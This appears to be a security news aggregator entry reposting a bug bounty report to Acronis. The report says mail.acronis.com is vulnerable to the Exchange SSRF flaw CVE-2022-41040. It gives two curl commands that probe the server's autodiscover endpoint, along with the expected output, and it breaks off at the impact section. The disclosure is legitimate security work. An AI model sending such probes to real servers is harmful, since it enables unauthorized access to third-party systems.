🕵️ Acronis: mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040
Nachrichtenbereich: 🕵️ Sicherheitslücken
🔗 Quelle: vulners.com
Hello Acronis team, Please run curl -ksL -m5 -o /dev/null -I -w "%{http_code}" "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync" curl -ksL -m5 "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync" | grep Protocol and get following output 404 and {"Protocol":"ActiveSync","Url":"https://eas.outlook.com/Microsoft-Server-ActiveSync"} Proving that mail.acronis.com is vulnerable to CVE-2022-41040 Poc video attached Impact SSRF can be used to for unauthorized actions or access to confidential... ...